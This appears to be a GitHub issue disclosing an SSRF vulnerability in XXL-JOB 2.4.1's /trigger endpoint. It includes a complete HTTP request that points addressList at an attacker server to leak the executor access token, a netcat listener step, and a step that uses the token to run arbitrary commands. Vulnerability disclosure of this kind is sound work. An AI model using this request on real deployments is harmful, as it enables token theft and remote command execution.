You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.4.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobInfoController.java of Xxl-job 2.4.1, which originates from /trigger, it directly sends a request to the address specified by addressList without judging whether the addressList parameter is the valid executor address. It can make the SSRF vulnerability, the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.
The /trigger interface call only needs to be a low Privilege user of the platform。
Steps to reproduce the behavior
condition:
XXL-JOB <= 2.4.1 (latest version)
Regular user account
Know a JobId (which can be obtained by traversal)
Create a normal user normal without any executor permissions。
When using the normal user to call the interface, set the input parameter addressList to the http server address , and print the XXL-JOB-ACCESS-TOKEN directly on the target server
POST /xxl-job-admin/jobinfo/trigger HTTP/1.1Host: 10.248.28.212:8080Content-Length: 69Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=UTF-8Origin: http://10.248.28.212:8080Referer: http://10.248.28.212:8080/xxl-job-admin/jobinfoAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: XXL_JOB_LOGIN_IDENTITY=7b226964223a322c22757365726e616d65223a2274657374222c2270617373776f7264223a226531306164633339343962613539616262653536653035376632306638383365222c22726f6c65223a302c227065726d697373696f6e223a22227dConnection: closeid=1&executorParam=test&addressList=http%3A%2F%2F10.248.28.212%3A9999
3. nc in vps
4. Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands
Which version of XXL-JOB do you using?
2.4.1(latest)
vulnerability description
XXL-JOB is a distributed task scheduling platform based on java language in the XXL (XXL-JOB) community.
There is an SSRF vulnerability in xxl-job-2.4.1/xxl-job-admin/src/main/java/com/xxl/job/admin/controller/JobInfoController.java of Xxl-job 2.4.1, which originates from /trigger, it directly sends a request to the address specified by addressList without judging whether the addressList parameter is the valid executor address. It can make the SSRF vulnerability, the attacker obtains XXL-JOB-ACCESS-TOKEN and calls any executor, causing the execution of arbitrary commands of the executor.
The /trigger interface call only needs to be a low Privilege user of the platform。
Steps to reproduce the behavior
condition:
3. nc in vps
4. Use the token to call the task trigger interface of the executor Restful API to execute arbitrary commands
Other information
the vulnerability is similar to the CVE-2022-43183
The text was updated successfully, but these errors were encountered: